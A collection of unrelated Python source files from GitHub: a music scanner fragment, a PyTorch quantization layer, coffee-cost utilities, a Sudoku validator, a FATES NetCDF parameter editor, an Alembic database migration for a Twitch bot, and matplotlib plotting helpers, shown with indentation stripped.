return ar
ar = Artist()
ar.name = artist
self.__store.add(ar)
self.__added_artists += 1
return ar
def __find_folder(self, path, folder):
path = os.path.dirname(path)
fold = self.__store.find(Folder, Folder.path == path).one()
if fold:
return fold
full_path = folder.path
path = path[len(folder.path) + 1:]
for name in path.split(os.sep):
full_path = os.path.join(full_path, name)
fold = self.__store.find(Folder, Folder.path == full_path).one()
if not fold:
fold = Folder()
fold.root = False
fold.name = name
fold.path = full_path
fold.parent = folder
self.__store.add(fold)
folder = fold
return folder
def __try_load_tag(self, path):
try:
return mutagen.File(path, easy = True)
except:
return None
def __try_read_tag(self, metadata, field, default = None, transform = lambda x: x[0]):
try:
value = metadata[field]
if not value:
return default
if transform:
value = transform(value)
return value if value else default
except:
return default
def __cleanup_folder(self, folder):
for f in folder.children:
self.__cleanup_folder(f)
if folder.children.count() == 0 and folder.tracks.count() == 0 and not folder.root:
self.__store.remove(folder)
def stats(self):
return (self.__added_artists, self.__added_albums, self.__added_tracks), (self.__deleted_artists, self.__deleted_albums, self.__deleted_tracks)
| maikelwever/supysonic | supysonic/scanner.py | scanner.py | py | 5,576 | python | en | code | null | github-code | 50 |
42751401954 | import torch
import torch.nn as nn
import numpy as np
from numpy import linalg as LA
class QuantizationF(torch.autograd.Function):
@staticmethod
def forward(ctx, input, islinear, scale):
ctx.save_for_backward(input)
ctx.islinear = islinear
ctx.scale = scale
if ctx.islinear: #linear
if ctx.scale is None:
return input
else:
input = (input / ctx.scale).round().clamp(-127, 127) * ctx.scale
return input
else: # relu
if ctx.scale is None:
return input.clamp(min=0.0)
else:
input = (input / ctx.scale).round().clamp(0, 255) * ctx.scale
return input
@staticmethod
def backward(ctx, grad_output):
input, = ctx.saved_tensors
grad_input = grad_output.clone()
if not ctx.islinear: # relu
if ctx.scale is None:
#grad_input[input.ge(6.0)] = 0
grad_input[input.le(0.0)] = 0
else:
grad_input[input.ge(255*ctx.scale)] = 0
grad_input[input.le(0.0)] = 0
return grad_input, None, None
class Quantization(nn.Module):
def __init__(self, islinear, scale=None):
super(Quantization, self).__init__()
self.islinear = islinear
self.scale = scale
def set_scale(self, scale):
self.scale = scale
def forward(self, x):
return QuantizationF.apply(x, self.islinear, self.scale)
| peiswang/FFN | models/quan.py | quan.py | py | 1,528 | python | en | code | 2 | github-code | 50 |
37070866974 | ## coffee_creator.py - CoffeeMachine: Create a coffee
# GPLv3 (c) 2020 Laurent Bourgon
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
# Librairies
from typing import Dict, Tuple, Set
class Coffee:
"""## Basic Coffee Class
### Arguments:\n
\tname {str} -- Name of the coffee
\tingredients {Dict[str, int]} -- Dictionary of the ingredients in format {ingredients: amount}
\tprice {int} -- Price of the coffee
"""
def __init__(self, name: str, ingredients: Dict[str, int], price: int):
self.name: str = str(name)
self.ingredients: Dict[str, int] = {
ingredient: int(amount)
for ingredient, amount in ingredients.items()
if isinstance(amount, int)
}
self.price: int = int(price)
def __str__(self) -> str:
return f"{self.name} - {self.price}$:\t{' | '.join([f'{ingredient} - {amount} mL' for ingredient, amount in self.ingredients.items()])}"
class CoffeeCreator(Coffee):
"""## `Coffee` Sub-Class with Additional Features
### Arguments:\n
\tname {str} -- Name of the coffee
\tingredients {Dict[str, int]} -- Dictionary of the ingredients in format {ingredient: amount}
\tprice {int} -- Price of the coffee
"""
def __init__(self, name: str, ingredients: Dict[str, int], price: int):
super().__init__(name, ingredients, price)
def final_cost(self, number_of_coffees: int) -> int:
"""Return the total price of the number of coffees specified"""
return self.price * int(number_of_coffees)
def ingredients_needed(self, number_of_coffees: int) -> Dict[str, int]:
"""Return how many ingredients will be needed for the number of coffees specified"""
return {
ingredient: amount * int(number_of_coffees)
for ingredient, amount in self.ingredients.items()
}
def coffees_possible_cost(self, price: int) -> int:
"""Return the maximum number of coffees you could get for a certain price"""
return int(price) // self.price
def coffees_possible_ingredient(self, ingredient: str, amount: int) -> int:
"""Return the maximum number of coffees you could make for one ingredient"""
return int(amount) // self.ingredients.get(ingredient)
def limiting_ingredient(
self, limited_ingredients: Dict[str, int]
) -> Tuple[int, Set[str]]:
"""## Return the maximum number of coffees you can make
### Arguments:\n
\tlimitedingredients {Dict[str, int]} -- Dictionary of ingredients in format {ingredient: amount} (if amount = -1: skipped)
### Returns:\n
\t{Tuple[int, Set[int, str]]} -- 0 {int}: Maximum number of coffees - 1 {set}: Limiters
"""
# If an ingredient is missing, set its value to 0
for ingredient in self.ingredients:
limited_ingredients.setdefault(ingredient, 0)
# Find how many coffees each ingredient can make
# If amount = -1 => infinity, we need to remove it
amount_of_coffees: Dict[str, int] = {
ingredient: self.coffees_possible_ingredient(ingredient, amount)
for ingredient, amount in limited_ingredients.items()
if ingredient in self.ingredients and amount >= 0
}
# If everything was -1, no coffees can be made
if not amount_of_coffees:
return (0, set())
# Create an empty dict
possible_ingredients: Dict[int, Set[str]] = {}
for ingredient, amount in amount_of_coffees.items():
possible_ingredients.setdefault(amount, set()).update([ingredient])
# Find the maximum value of coffees you can make
max_possible: int = min(possible_ingredients.keys())
return (max_possible, possible_ingredients[max_possible])
| BourgonLaurent/CoffeeMachine | CoffeeMachine/coffee_creator.py | coffee_creator.py | py | 4,461 | python | en | code | 0 | github-code | 50 |
34655327754 | _author_ = 'jake'
_project_ = 'leetcode'
# https://leetcode.com/problems/valid-sudoku/
# Determine if a Sudoku is valid, according to: Sudoku Puzzles - The Rules.
# The Sudoku board could be partially filled, where empty cells are filled with the character '.'.
# Create a set of digits seen in each row, column and box. False if any duplicates.
# Time - O(n^2) for board of side n
# Space - O(n)
class Solution(object):
def isValidSudoku(self, board):
"""
:type board: List[List[str]]
:rtype: bool
"""
size = 9
digits = {str(i) for i in range(1,10)}
rows = [set() for _ in range(size)]
cols = [set() for _ in range(size)]
boxes = [set() for _ in range(size)]
for r in range(size):
for c in range(size):
digit = board[r][c]
if digit == '.':
continue
if digit not in digits:
return False
box = (size//3) * (r // (size//3)) + (c // (size//3))
if digit in rows[r] or digit in cols[c] or digit in boxes[box]:
return False
rows[r].add(digit)
cols[c].add(digit)
boxes[box].add(digit)
return True | jakehoare/leetcode | python_1_to_1000/036_Valid_Sudoku.py | 036_Valid_Sudoku.py | py | 1,290 | python | en | code | 49 | github-code | 50 |
70618463514 | #!/usr/bin/env python
#### this script modifies a FATES parameter file. It accepts the following flags
# --var or --variable: variable.
# --pft or --PFT: PFT number. If this is missing, script will assume that its a global variable that is being modified.
# --input or --fin: input filename.
# --output or --fout: output filename. If missing, will assume its directly modifying the input file, and will prompt unless -O is specified
# --O or --overwrite: overwrite output file without asking.
# --value or --val: value to put in variable
# --s or --silent: don't write anything on successful execution.
####
#
# Written by C. Koven, 2018
#
# =======================================================================================
# =======================================================================================
import os
from scipy.io import netcdf as nc
import argparse
import shutil
import tempfile
import sys
import datetime
import time
# ========================================================================================
# ========================================================================================
# Main
# ========================================================================================
# ========================================================================================
def main():
parser = argparse.ArgumentParser(description='Parse command line arguments to this script.')
#
parser.add_argument('--var','--variable', dest='varname', type=str, help="What variable to modify? Required.", required=True)
parser.add_argument('--pft','--PFT', dest='pftnum', type=int, help="PFT number to modify. If this is missing and --allPFTs is not specified, will assume a global variable.")
parser.add_argument('--allPFTs', '--allpfts', dest='allpfts', help="apply to all PFT indices. Cannot use at same time as --pft argument.", action="store_true")
parser.add_argument('--fin', '--input', dest='inputfname', type=str, help="Input filename. Required.", required=True)
parser.add_argument('--fout','--output', dest='outputfname', type=str, help="Output filename. Required.", required=True)
parser.add_argument('--val', '--value', dest='val', type=float, help="New value of PFT variable. Required.", required=True)
parser.add_argument('--O','--overwrite', dest='overwrite', help="If present, automatically overwrite the output file.", action="store_true")
parser.add_argument('--silent', '--s', dest='silent', help="prevent writing of output.", action="store_true")
parser.add_argument('--nohist', dest='nohist', help="prevent recording of the edit in the history attribute of the output file", action="store_true")
#
args = parser.parse_args()
#
# work with the file in some random temporary place so that if something goes wrong, then nothing happens to original file and it doesn't make a persistent output file
tempdir = tempfile.mkdtemp()
tempfilename = os.path.join(tempdir, 'temp_fates_param_file.nc')
#
try:
shutil.copyfile(args.inputfname, tempfilename)
#
ncfile = nc.netcdf_file(tempfilename, 'a')
#
var = ncfile.variables[args.varname]
#
### check to make sure that, if a PFT is specified, the variable has a PFT dimension, and if not, then it doesn't. and also that shape is reasonable.
ndim_file = len(var.dimensions)
ispftvar = False
# for purposes of current state of this script, assume 1D
if ndim_file > 1:
raise ValueError('variable dimensionality is too high for this script')
if ndim_file < 1:
raise ValueError('variable dimensionality is too low for this script. FATES assumes even scalars have a 1-length dimension')
for i in range(ndim_file):
if var.dimensions[i] == 'fates_pft':
ispftvar = True
npft_file = var.shape[i]
pftdim = 0
elif var.dimensions[i] == 'fates_scalar':
npft_file = None
pftdim = None
else:
raise ValueError('variable is not on either the PFT or scalar dimension')
if (args.pftnum == None and ispftvar) and not args.allpfts:
raise ValueError('pft value is missing but variable has pft dimension.')
if (args.pftnum != None) and args.allpfts:
raise ValueError("can't specify both a PFT number and the argument allPFTs.")
if args.pftnum != None and not ispftvar:
raise ValueError('pft value is present but variable does not have pft dimension.')
if args.pftnum != None and ispftvar:
if args.pftnum > npft_file:
raise ValueError('PFT specified ('+str(args.pftnum)+') is larger than the number of PFTs in the file ('+str(npft_file)+').')
if pftdim == 0:
if not args.silent:
print('replacing prior value of variable '+args.varname+', for PFT '+str(args.pftnum)+', which was '+str(var[args.pftnum-1])+', with new value of '+str(args.val))
var[args.pftnum-1] = args.val
elif args.allpfts and ispftvar:
if pftdim == 0:
if not args.silent:
print('replacing prior values of variable '+args.varname+', for all PFTs, which were '+str(var[:])+', with new value of '+str(args.val))
var[:] = args.val
elif args.pftnum == None and not ispftvar:
if not args.silent:
print('replacing prior value of variable '+args.varname+', which was '+str(var[:])+', with new value of '+str(args.val))
var[:] = args.val
else:
raise ValueError('Nothing happened somehow.')
#
if not args.nohist:
# write to the netcdf file history attribute what you just did.
actionstring = 'modify_fates_paramfile.py '+' '.join(sys.argv[1:])
timestampstring = datetime.datetime.fromtimestamp(time.time()).strftime('%a %b %d %Y, %H:%M:%S')
#
oldhiststr = ncfile.history
newhiststr = oldhiststr + "\n "+timestampstring + ': ' + actionstring
ncfile.history = newhiststr
#
ncfile.close()
#
#
# now move file from temporary location to final location
#
# check to see if output file exists
if os.path.isfile(args.outputfname):
if args.overwrite:
if not args.silent:
print('replacing file: '+args.outputfname)
os.remove(args.outputfname)
else:
raise ValueError('Output file already exists and overwrite flag not specified for filename: '+args.outputfname)
#
shutil.move(tempfilename, args.outputfname)
shutil.rmtree(tempdir, ignore_errors=True)
except:
shutil.rmtree(tempdir, ignore_errors=True)
raise
# =======================================================================================
# This is the actual call to main
if __name__ == "__main__":
main()
| NGEET/fates-release | tools/modify_fates_paramfile.py | modify_fates_paramfile.py | py | 7,190 | python | en | code | 11 | github-code | 50 |
19769448823 | revision = 'affc03cb46f5'
down_revision = '988883a6be1d'
branch_labels = None
depends_on = None
import alembic
import sqlalchemy
import json
import itertools
import requests
import logging
import urllib.parse
log = logging.getLogger("affc03cb46f5_game_data")
def upgrade():
conn = alembic.context.get_context().bind
meta = sqlalchemy.MetaData(bind=conn)
meta.reflect()
users = meta.tables["users"]
all_users = dict(conn.execute(sqlalchemy.select(users.c.name, users.c.id)).fetchall())
shows = alembic.op.create_table(
"shows",
sqlalchemy.Column("id", sqlalchemy.Integer, primary_key=True),
sqlalchemy.Column("string_id", sqlalchemy.Text, nullable=False, unique=True),
sqlalchemy.Column("name", sqlalchemy.Text, nullable=False),
)
alembic.op.execute(sqlalchemy.schema.CreateSequence(sqlalchemy.Sequence("games_id_seq", start=-1, increment=-1)))
games = alembic.op.create_table(
"games",
sqlalchemy.Column("id", sqlalchemy.Integer, sqlalchemy.Sequence("game_id_seq"), primary_key=True, server_default=sqlalchemy.func.nextval('games_id_seq')),
sqlalchemy.Column("name", sqlalchemy.Text, unique=True, nullable=False),
)
alembic.op.execute("ALTER SEQUENCE games_id_seq OWNED BY games.id")
game_per_show_data = alembic.op.create_table(
"game_per_show_data",
sqlalchemy.Column("game_id", sqlalchemy.Integer, sqlalchemy.ForeignKey("games.id", ondelete="CASCADE", onupdate="CASCADE"), nullable=False),
sqlalchemy.Column("show_id", sqlalchemy.Integer, sqlalchemy.ForeignKey("shows.id", ondelete="CASCADE", onupdate="CASCADE"), nullable=False),
sqlalchemy.Column("display_name", sqlalchemy.Text),
sqlalchemy.Column("verified", sqlalchemy.Boolean),
)
alembic.op.create_primary_key("game_per_show_data_pk", "game_per_show_data", ["game_id", "show_id"])
stats = alembic.op.create_table(
"stats",
sqlalchemy.Column("id", sqlalchemy.Integer, primary_key=True),
sqlalchemy.Column("string_id", sqlalchemy.Text, nullable=False, unique=True),
sqlalchemy.Column("singular", sqlalchemy.Text),
sqlalchemy.Column("plural", sqlalchemy.Text),
sqlalchemy.Column("emote", sqlalchemy.Text),
)
game_stats = alembic.op.create_table(
"game_stats",
sqlalchemy.Column("game_id", sqlalchemy.Integer, sqlalchemy.ForeignKey("games.id", ondelete="CASCADE", onupdate="CASCADE"), nullable=False),
sqlalchemy.Column("show_id", sqlalchemy.Integer, sqlalchemy.ForeignKey("shows.id", ondelete="CASCADE", onupdate="CASCADE"), nullable=False),
sqlalchemy.Column("stat_id", sqlalchemy.Integer, sqlalchemy.ForeignKey("shows.id", ondelete="CASCADE", onupdate="CASCADE"), nullable=False),
sqlalchemy.Column("count", sqlalchemy.Integer, nullable=False),
)
alembic.op.create_primary_key("game_stats_pk", "game_stats", ["game_id", "show_id", "stat_id"])
game_votes = alembic.op.create_table(
"game_votes",
sqlalchemy.Column("game_id", sqlalchemy.Integer, sqlalchemy.ForeignKey("games.id", ondelete="CASCADE", onupdate="CASCADE"), nullable=False),
sqlalchemy.Column("show_id", sqlalchemy.Integer, sqlalchemy.ForeignKey("shows.id", ondelete="CASCADE", onupdate="CASCADE"), nullable=False),
sqlalchemy.Column("user_id", sqlalchemy.Integer, sqlalchemy.ForeignKey("users.id", ondelete="CASCADE", onupdate="CASCADE"), nullable=False),
sqlalchemy.Column("vote", sqlalchemy.Boolean, nullable=False),
)
alembic.op.create_primary_key("game_votes_pk", "game_votes", ["game_id", "show_id", "user_id"])
disabled_stats = alembic.op.create_table(
"disabled_stats",
sqlalchemy.Column("show_id", sqlalchemy.Integer, sqlalchemy.ForeignKey("shows.id", ondelete="CASCADE", onupdate="CASCADE"), nullable=False),
sqlalchemy.Column("stat_id", sqlalchemy.Integer, sqlalchemy.ForeignKey("stats.id", ondelete="CASCADE", onupdate="CASCADE"), nullable=False),
)
alembic.op.create_primary_key("disabled_stats_pk", "disabled_stats", ["show_id", "stat_id"])
# Move data
datafile = alembic.context.config.get_section_option("lrrbot", "datafile", "data.json")
clientid = alembic.context.config.get_section_option("lrrbot", "twitch_clientid")
clientsecret = alembic.context.config.get_section_option("lrrbot", "twitch_clientsecret")
with open(datafile) as f:
data = json.load(f)
# stats
alembic.op.bulk_insert(stats, [{
"string_id": string_id,
"emote": values.get("emote"),
"plural": values.get("plural"),
"singular": values.get("singular"),
} for string_id, values in data.get("stats", {}).items()])
all_stats = dict(conn.execute(sqlalchemy.select(stats.c.string_id, stats.c.id)).fetchall())
# shows
alembic.op.bulk_insert(shows, [{
"string_id": show,
"name": values["name"],
} for show, values in data.get("shows", {}).items()])
all_shows = dict(conn.execute(sqlalchemy.select(shows.c.string_id, shows.c.id)).fetchall())
# games
def parse_id(id):
if id is None:
return None
try:
return int(id)
except ValueError:
return None
for show in data.get("shows", {}).values():
for game_id, game in show.get("games", {}).items():
game_id = parse_id(game_id) or parse_id(game.get("id"))
if game_id is None:
conn.execute("INSERT INTO games (name) VALUES (%(name)s) ON CONFLICT (name) DO NOTHING", {"name": game["name"]})
else:
conn.execute("""
INSERT INTO games (
id,
name
) VALUES (
%(id)s,
%(name)s
) ON CONFLICT (name) DO UPDATE SET
id = EXCLUDED.id
""", {"id": game_id, "name": game["name"]})
all_games = dict(conn.execute(sqlalchemy.select(games.c.name, games.c.id)).fetchall())
# game_per_show_data
display_names = []
for show_id, show in data.get("shows", {}).items():
for game in show.get("games", {}).values():
if "display" in game:
display_names.append({
"show_id": all_shows[show_id],
"game_id": parse_id(game.get("id")) or all_games[game["name"]],
"display_name": game["display"],
})
alembic.op.bulk_insert(game_per_show_data, display_names)
# game_stats
all_game_stats = []
for show_id, show in data.get("shows", {}).items():
for game in show.get("games", {}).values():
game_id = parse_id(game.get("id")) or all_games[game["name"]]
for stat, count in game.get("stats", {}).items():
all_game_stats.append({
"show_id": all_shows[show_id],
"game_id": game_id,
"stat_id": all_stats[stat],
"count": count,
})
alembic.op.bulk_insert(game_stats, all_game_stats)
# game_votes
all_votes = []
with requests.Session() as session:
req = session.post('https://id.twitch.tv/oauth/token', params={
'client_id': clientid,
'client_secret': clientsecret,
'grant_type': 'client_credentials',
})
req.raise_for_status()
token = req.json()['access_token']
for show_id, show in data.get("shows", {}).items():
for game in show.get("games", {}).values():
game_id = parse_id(game.get("id")) or all_games[game["name"]]
for nick, vote in game.get("votes", {}).items():
if nick not in all_users:
try:
req = session.get(
"https://api.twitch.tv/helix/users?login=%s" % urllib.parse.quote(nick),
headers={'Client-ID': clientid, 'Authorization': f'Bearer {token}'})
req.raise_for_status()
user = req.json()['data'][0]
all_users[nick] = user["id"]
alembic.op.bulk_insert(users, [{
"id": user["id"],
"name": user["login"],
"display_name": user.get("display_name"),
}])
except Exception:
log.exception("Failed to fetch data for %r", nick)
all_users[nick] = None
if all_users[nick] is None:
continue
all_votes.append({
"show_id": all_shows[show_id],
"game_id": game_id,
"user_id": all_users[nick],
"vote": vote,
})
alembic.op.bulk_insert(game_votes, all_votes)
# disabled_stats
if "swiftlycam" in all_shows:
for_cameron = []
if "death" in all_stats:
for_cameron.append({
"show_id": all_shows["swiftlycam"],
"stat_id": all_stats["death"]
})
if "tilt" in all_stats:
for_cameron.append({
"show_id": all_shows["swiftlycam"],
"stat_id": all_stats["tilt"]
})
if "pave" in all_stats:
for_cameron.append({
"show_id": all_shows["swiftlycam"],
"stat_id": all_stats["pave"],
})
alembic.op.bulk_insert(disabled_stats, for_cameron)
alembic.op.add_column("quotes", sqlalchemy.Column("game_id", sqlalchemy.Integer, sqlalchemy.ForeignKey("games.id", ondelete="CASCADE", onupdate="CASCADE")))
alembic.op.add_column("quotes", sqlalchemy.Column("show_id", sqlalchemy.Integer, sqlalchemy.ForeignKey("shows.id", ondelete="CASCADE", onupdate="CASCADE")))
alembic.op.execute("""
UPDATE quotes
SET
show_id = shows.id
FROM shows
WHERE quotes.show = shows.name
""")
alembic.op.execute("""
UPDATE quotes
SET
game_id = game_per_show_data.game_id
FROM game_per_show_data
WHERE quotes.game = game_per_show_data.display_name AND game_per_show_data.show_id = quotes.show_id
""")
alembic.op.execute("""
UPDATE quotes
SET
game_id = games.id
FROM games
WHERE quotes.game = games.name
""")
alembic.op.drop_column("quotes", "game")
alembic.op.drop_column("quotes", "show")
data.pop("shows", None)
data.pop("stats", None)
with open(datafile, "w") as f:
json.dump(data, f, indent=2, sort_keys=True)
def downgrade():
conn = alembic.context.get_context().bind
meta = sqlalchemy.MetaData(bind=conn)
meta.reflect()
datafile = alembic.context.config.get_section_option("lrrbot", "datafile", "data.json")
with open(datafile) as f:
data = json.load(f)
data["stats"] = {}
stats = meta.tables["stats"]
for id, singular, plural, emote in conn.execute(sqlalchemy.select(stats.c.string_id, stats.c.singular, stats.c.plural, stats.c.emote)):
data["stats"][id] = {}
if singular is not None:
data["stats"][id]["singular"] = singular
if plural is not None:
data["stats"][id]["plural"] = plural
if emote is not None:
data["stats"][id]["emote"] = emote
data["shows"] = {}
shows = meta.tables["shows"]
games = meta.tables["games"]
game_per_show_data = meta.tables["game_per_show_data"]
game_votes = meta.tables["game_votes"]
game_stats = meta.tables["game_stats"]
users = meta.tables["users"]
for fkey, id, name in conn.execute(sqlalchemy.select(shows.c.id, shows.c.string_id, shows.c.name)).fetchall():
data["shows"][id] = {"name": name, "games": {}}
query = sqlalchemy.select(games.c.id, games.c.name, stats.c.string_id, game_stats.c.count)
query = query.select_from(
game_stats
.join(games, game_stats.c.game_id == games.c.id)
.join(stats, game_stats.c.stat_id == stats.c.id)
)
query = query.where(game_stats.c.show_id == fkey)
for game_id, name, stat_id, count in conn.execute(query).fetchall():
if game_id < 0:
game_id = name
else:
game_id = str(game_id)
data["shows"][id]["games"].setdefault(game_id, {"id": game_id, "name": name, "stats": {}, "votes": {}})["stats"][stat_id] = count
query = sqlalchemy.select(games.c.id, games.c.name, users.c.name, game_votes.c.vote)
query = query.select_from(
game_votes
.join(games, game_votes.c.game_id == games.c.id)
.join(users, game_votes.c.user_id == users.c.id)
)
query = query.where(game_votes.c.show_id == fkey)
for game_id, name, user, vote in conn.execute(query).fetchall():
if game_id < 0:
game_id = name
else:
game_id = str(game_id)
data["shows"][id]["games"].setdefault(game_id, {"id": game_id, "name": name, "stats": {}, "votes": {}})["votes"][user] = vote
query = sqlalchemy.select(games.c.id, games.c.name, game_per_show_data.c.display_name)
query = query.select_from(
game_per_show_data.join(games, game_per_show_data.c.game_id == games.c.id)
)
query = query.where(game_per_show_data.c.show_id == fkey)
for game_id, name, display_name in conn.execute(query).fetchall():
if game_id < 0:
game_id = name
else:
game_id = str(game_id)
if display_name is not None:
data["shows"][id]["games"].setdefault(game_id, {"id": game_id, "name": name, "stats": {}, "votes": {}})["display"] = display_name
alembic.op.add_column("quotes", sqlalchemy.Column("game", sqlalchemy.Text))
alembic.op.add_column("quotes", sqlalchemy.Column("show", sqlalchemy.Text))
alembic.op.execute("""
UPDATE quotes
SET
show = shows.name
FROM shows
WHERE quotes.show_id = shows.id
""")
alembic.op.execute("""
UPDATE quotes
SET
game = games.name
FROM games
WHERE quotes.game_id = games.id
""")
alembic.op.execute("""
UPDATE quotes
SET
game = game_per_show_data.display_name
FROM game_per_show_data
WHERE quotes.game_id = game_per_show_data.game_id AND game_per_show_data.show_id = quotes.show_id
""")
alembic.op.drop_column("quotes", "game_id")
alembic.op.drop_column("quotes", "show_id")
alembic.op.drop_table("disabled_stats")
alembic.op.drop_table("game_votes")
alembic.op.drop_table("game_stats")
alembic.op.drop_table("stats")
alembic.op.drop_table("game_per_show_data")
alembic.op.drop_table("games")
alembic.op.drop_table("shows")
with open(datafile, "w") as f:
json.dump(data, f, indent=2, sort_keys=True)
| mrphlip/lrrbot | alembic/versions/affc03cb46f5_game_data.py | affc03cb46f5_game_data.py | py | 13,052 | python | en | code | 30 | github-code | 50 |
71590351834 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
# 概要
plot補助ツール群
# 参考
* [matplotlibでグラフの文字サイズを大きくする](https://goo.gl/E5fLxD)
* [Customizing matplotlib](http://matplotlib.org/users/customizing.html)
"""
import numpy as np
from cycler import cycler
import matplotlib.pyplot as plt
import matplotlib.patches as patches
from matplotlib.ticker import AutoMinorLocator
import colorsys
import matplotlib.font_manager as fm
cycle_num = 6
v_offset = 0.2
s = np.arange(cycle_num) / (cycle_num - 1) * (1 - v_offset) + v_offset
s = s[::-1]
r_cycle = []
g_cycle = []
b_cycle = []
for s_val in s:
r, g, b = colorsys.hsv_to_rgb(0.0, s_val, 0.9)
color = "#{:02X}{:02X}{:02X}".format(np.uint8(np.round(r * 0xFF)),
np.uint8(np.round(g * 0xFF)),
np.uint8(np.round(b * 0xFF)))
r_cycle.append(color)
r, g, b = colorsys.hsv_to_rgb(0.3, s_val, 0.9)
color = "#{:02X}{:02X}{:02X}".format(np.uint8(np.round(r * 0xFF)),
np.uint8(np.round(g * 0xFF)),
np.uint8(np.round(b * 0xFF)))
g_cycle.append(color)
r, g, b = colorsys.hsv_to_rgb(0.6, s_val, 0.9)
color = "#{:02X}{:02X}{:02X}".format(np.uint8(np.round(r * 0xFF)),
np.uint8(np.round(g * 0xFF)),
np.uint8(np.round(b * 0xFF)))
b_cycle.append(color)
def _set_common_parameters(fontsize, **kwargs):
# japanese font
# ---------------------------------------
fonts = fm.findSystemFonts()
for font in fonts:
font_name = fm.FontProperties(fname=font).get_name()
if font_name == 'Noto Sans CJK JP':
plt.rcParams['font.family'] = font_name
plt.rcParams["font.weight"] = 'regular'
plt.rcParams["axes.labelweight"] = "regular"
plt.rcParams["axes.titleweight"] = "regular"
print("{:s} is found".format(font_name))
break
# if font_name == 'Noto Sans Mono CJK JP':
# plt.rcParams['font.family'] = font_name
# print("{:s} is found".format(font_name))
# break
# font size
# ---------------------------------------
if fontsize:
plt.rcParams["font.size"] = fontsize
if 'tick_size' in kwargs and kwargs['tick_size']:
plt.rcParams['xtick.labelsize'] = kwargs['tick_size']
plt.rcParams['ytick.labelsize'] = kwargs['tick_size']
if 'xtick_size' in kwargs and kwargs['xtick_size']:
plt.rcParams['xtick.labelsize'] = kwargs['xtick_size']
if 'ytick_size' in kwargs and kwargs['ytick_size']:
plt.rcParams['ytick.labelsize'] = kwargs['ytick_size']
if 'axis_label_size' in kwargs and kwargs['axis_label_size']:
plt.rcParams['axes.labelsize'] = kwargs['axis_label_size']
if 'graph_title_size' in kwargs and kwargs['graph_title_size']:
plt.rcParams['axes.titlesize'] = kwargs['graph_title_size']
if 'legend_size' in kwargs and kwargs['legend_size']:
plt.rcParams['legend.fontsize'] = kwargs['legend_size']
# plot style
# ---------------------------------------
if 'grid' in kwargs:
if kwargs['grid']:
plt.rcParams['axes.grid'] = True
else:
plt.rcParams['axes.grid'] = False
else:
plt.rcParams['axes.grid'] = True
# line style
# ---------------------------------------
if 'linewidth' in kwargs and kwargs['linewidth']:
plt.rcParams['lines.linewidth'] = kwargs['linewidth']
if 'prop_cycle' in kwargs and kwargs['prop_cycle']:
plt.rcParams['axes.prop_cycle'] = kwargs['prop_cycle']
def plot_1_graph(fontsize=20, **kwargs):
_set_common_parameters(fontsize=fontsize, **kwargs)
if 'figsize' in kwargs and kwargs['figsize']:
figsize = kwargs['figsize']
else:
figsize = (10, 8)
if 'dpi' in kwargs and kwargs['dpi']:
fig = plt.figure(figsize=figsize, dpi=kwargs['dpi'])
else:
fig = plt.figure(figsize=figsize)
ax1 = fig.add_subplot(111)
if 'xlim' in kwargs and kwargs['xlim']:
ax1.set_xlim(kwargs['xlim'][0], kwargs['xlim'][1])
if 'ylim' in kwargs and kwargs['ylim']:
ax1.set_ylim(kwargs['ylim'][0], kwargs['ylim'][1])
if 'graph_title' in kwargs and kwargs['graph_title']:
ax1.set_title(kwargs['graph_title'])
else:
ax1.set_title("Title")
if 'xlabel' in kwargs and kwargs['xlabel']:
ax1.set_xlabel(kwargs['xlabel'])
else:
# ax1.set_xlabel("X Axis Label")
pass
if 'ylabel' in kwargs and kwargs['ylabel']:
ax1.set_ylabel(kwargs['ylabel'])
else:
# ax1.set_ylabel("Y Axis Label")
pass
if 'xtick' in kwargs and kwargs['xtick']:
ax1.set_xticks(kwargs['xtick'])
if 'ytick' in kwargs and kwargs['ytick']:
ax1.set_yticks(kwargs['ytick'])
if 'minor_xtick_num' in kwargs and kwargs['minor_xtick_num']:
minor_locator = AutoMinorLocator(kwargs['minor_xtick_num'])
ax1.xaxis.set_minor_locator(minor_locator)
ax1.xaxis.grid(which='minor', color="#808080")
ax1.tick_params(axis='x', which='minor', length=0.0)
if 'minor_ytick_num' in kwargs and kwargs['minor_ytick_num']:
minor_locator = AutoMinorLocator(kwargs['minor_ytick_num'])
ax1.yaxis.set_minor_locator(minor_locator)
ax1.yaxis.grid(which='minor', color="#808080")
ax1.tick_params(axis='y', which='minor', length=0.0)
# Adjust the position
# ------------------------------------
fig.tight_layout()
return ax1
def plot_1_graph_ret_figure(fontsize=20, **kwargs):
_set_common_parameters(fontsize=fontsize, **kwargs)
if 'figsize' in kwargs and kwargs['figsize']:
figsize = kwargs['figsize']
else:
figsize = (10, 8)
fig = plt.figure(figsize=figsize)
ax1 = fig.add_subplot(111)
if 'xlim' in kwargs and kwargs['xlim']:
ax1.set_xlim(kwargs['xlim'][0], kwargs['xlim'][1])
if 'ylim' in kwargs and kwargs['ylim']:
ax1.set_ylim(kwargs['ylim'][0], kwargs['ylim'][1])
if 'graph_title' in kwargs and kwargs['graph_title']:
ax1.set_title(kwargs['graph_title'])
else:
ax1.set_title("Title")
if 'xlabel' in kwargs and kwargs['xlabel']:
ax1.set_xlabel(kwargs['xlabel'])
else:
ax1.set_xlabel("X Axis Label")
if 'ylabel' in kwargs and kwargs['ylabel']:
ax1.set_ylabel(kwargs['ylabel'])
else:
ax1.set_ylabel("Y Axis Label")
if 'xtick' in kwargs and kwargs['xtick']:
ax1.set_xticks(kwargs['xtick'])
if 'ytick' in kwargs and kwargs['ytick']:
ax1.set_yticks(kwargs['ytick'])
# Adjust the position
# ------------------------------------
fig.tight_layout()
return fig, ax1
def _check_hsv_space():
"""
# 概要
Linestyle で 明度が徐々か変わるやつを作りたいんだけど、
HSVの値がイマイチ分からないのでプロットしてみる。
"""
h_num = 11
s_num = 11
h = np.arange(h_num) / (h_num - 1)
s = np.arange(s_num) / (s_num - 1)
f, axarr = plt.subplots(h_num, s_num, sharex='col', sharey='row',
figsize=(16, 16))
for idx in range(h_num * s_num):
h_idx = idx % h_num
v_idx = idx // h_num
r, g, b = colorsys.hsv_to_rgb(h[h_idx], s[v_idx], 0.9)
